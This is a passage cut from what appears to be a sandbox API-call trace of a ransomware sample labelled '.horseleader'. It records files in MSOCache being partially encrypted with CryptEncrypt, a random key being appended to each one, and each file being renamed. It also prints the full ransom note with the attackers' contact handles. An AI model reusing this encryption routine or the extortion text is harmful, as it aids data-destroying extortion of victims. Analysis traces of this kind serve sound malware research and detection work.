"c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml.horseleader")) returned 1 [0205.456] GetProcessHeap () returned 0x780000 [0205.456] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0205.456] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30306de0, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0x30306de0, ftLastAccessTime.dwHighDateTime=0x1cbe56c, ftLastWriteTime.dwLowDateTime=0xa5b7cde0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x7e1dcd, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="ProjLR.cab", cAlternateFileName="")) returned 1 [0205.456] lstrcmpiW (lpString1="ProjLR.cab", lpString2="Windows") returned -1 [0205.456] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 77 [0205.456] StrStrIW (lpFirst="ProjLR.cab", lpSrch=".horseleader") returned 0x0 [0205.456] lstrcmpW (lpString1="ProjLR.cab", lpString2="#Decrypt#.txt") returned 1 [0205.463] lstrcmpW (lpString1="ProjLR.cab", lpString2="_uninstalling_.png") returned 1 [0205.471] lstrlenW (lpString=".testttjffg") returned 11 [0205.471] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".testttjffg") returned 0x0 [0205.471] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0205.471] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0205.471] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0205.484] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 77 [0205.484] StrStrW (lpFirst="ProjLR.cab", lpSrch=".txt") returned 0x0 [0205.484] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=8265165) returned 1 [0205.484] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.484] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0205.528] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0205.528] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0205.528] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x3ee6e6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.528] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0206.257] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0206.257] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0206.257] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x7dcdcd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.257] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0208.726] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0208.727] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0208.727] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0208.727] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0208.727] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0208.727] CloseHandle (hObject=0x21c) returned 1 [0208.728] GetProcessHeap () returned 0x780000 [0208.728] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0208.728] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab.horseleader") returned 89 [0208.728] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab.horseleader")) returned 1 [0208.729] GetProcessHeap () returned 0x780000 [0208.729] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0208.730] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x309dfcc0, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0x309dfcc0, ftLastAccessTime.dwHighDateTime=0x1cbe56c, ftLastWriteTime.dwLowDateTime=0xa5bc88d0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x750, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0208.730] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0208.730] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0208.730] StrStrIW (lpFirst="Setup.xml", lpSrch=".horseleader") returned 0x0 [0208.730] lstrcmpW (lpString1="Setup.xml", lpString2="#Decrypt#.txt") returned 1 [0208.730] lstrcmpW (lpString1="Setup.xml", lpString2="_uninstalling_.png") returned 1 [0208.730] lstrlenW (lpString=".testttjffg") returned 11 [0208.730] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".testttjffg") returned 0x0 [0208.730] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0208.730] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0208.730] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0208.731] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0208.731] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0208.731] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=1872) returned 1 [0208.731] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x750, lpOverlapped=0x0) returned 1 [0208.763] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xfffff8b0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0208.763] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x750, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x750, lpOverlapped=0x0) returned 1 [0208.763] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0208.764] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0208.764] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0208.764] CloseHandle (hObject=0x21c) returned 1 [0208.764] GetProcessHeap () returned 0x780000 [0208.764] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0208.764] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.horseleader") returned 88 [0208.764] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml.horseleader")) returned 1 [0208.765] GetProcessHeap () returned 0x780000 [0208.765] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0208.765] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x309dfcc0, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0x309dfcc0, ftLastAccessTime.dwHighDateTime=0x1cbe56c, ftLastWriteTime.dwLowDateTime=0xa5bc88d0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x750, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0208.765] FindClose (in: hFindFile=0x7c67a0 | out: hFindFile=0x7c67a0) returned 1 [0208.765] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\#Decrypt#.txt") returned 80 [0208.765] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\#Decrypt#.txt" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0208.766] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0208.766] WriteFile (in: hFile=0x1cc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af088*=0x5e4, lpOverlapped=0x0) returned 1 [0208.768] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0208.768] WriteFile (in: hFile=0x1cc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af088*=0x558, lpOverlapped=0x0) returned 1 [0208.768] CloseHandle (hObject=0x1cc) returned 1 [0208.768] GetProcessHeap () returned 0x780000 [0208.768] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a620 | out: hHeap=0x780000) returned 1 [0208.768] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee803530, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="{90140000-00BA-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~4")) returned 1 [0208.768] lstrcmpiW (lpString1="{90140000-00BA-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0208.768] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C") returned 66 [0208.769] lstrcmpW (lpString1="{90140000-00BA-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0208.769] lstrcmpW (lpString1="{90140000-00BA-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0208.769] lstrcmpW (lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0208.769] GetProcessHeap () returned 0x780000 [0208.769] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x79a620 [0208.769] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\*") returned 68 [0208.769] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee803530, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName=".", cAlternateFileName="")) returned 0x7c67a0 [0208.820] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0208.820] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\.") returned 68 [0208.820] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0208.820] StrStrIW (lpFirst=".", lpSrch=".horseleader") returned 0x0 [0208.820] lstrcmpW (lpString1=".", lpString2="#Decrypt#.txt") returned 1 [0208.820] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0208.820] lstrlenW (lpString=".testttjffg") returned 11 [0208.820] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\.", lpSrch=".testttjffg") returned 0x0 [0208.820] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0208.820] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0208.820] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\." (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0208.820] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee803530, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="..", cAlternateFileName="")) returned 1 [0208.821] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0208.821] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\..") returned 69 [0208.821] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0208.821] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0208.821] StrStrIW (lpFirst="..", lpSrch=".horseleader") returned 0x0 [0208.821] lstrcmpW (lpString1="..", lpString2="#Decrypt#.txt") returned 1 [0208.821] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0208.821] lstrlenW (lpString=".testttjffg") returned 11 [0208.821] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\..", lpSrch=".testttjffg") returned 0x0 [0208.821] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0208.821] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0208.821] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\.." (normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0208.821] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee4bb7b0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x3e7e1f, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="GrooveLR.cab", cAlternateFileName="")) returned 1 [0208.821] lstrcmpiW (lpString1="GrooveLR.cab", lpString2="Windows") returned -1 [0208.821] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 79 [0208.821] StrStrIW (lpFirst="GrooveLR.cab", lpSrch=".horseleader") returned 0x0 [0208.821] lstrcmpW (lpString1="GrooveLR.cab", lpString2="#Decrypt#.txt") returned 1 [0208.821] lstrcmpW (lpString1="GrooveLR.cab", lpString2="_uninstalling_.png") returned 1 [0208.822] lstrlenW (lpString=".testttjffg") returned 11 [0208.822] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab", lpSrch=".testttjffg") returned 0x0 [0208.822] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0208.822] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0208.822] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0208.823] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 79 [0208.823] StrStrW (lpFirst="GrooveLR.cab", lpSrch=".txt") returned 0x0 [0208.823] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=4095519) returned 1 [0208.823] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0208.823] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0208.827] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) 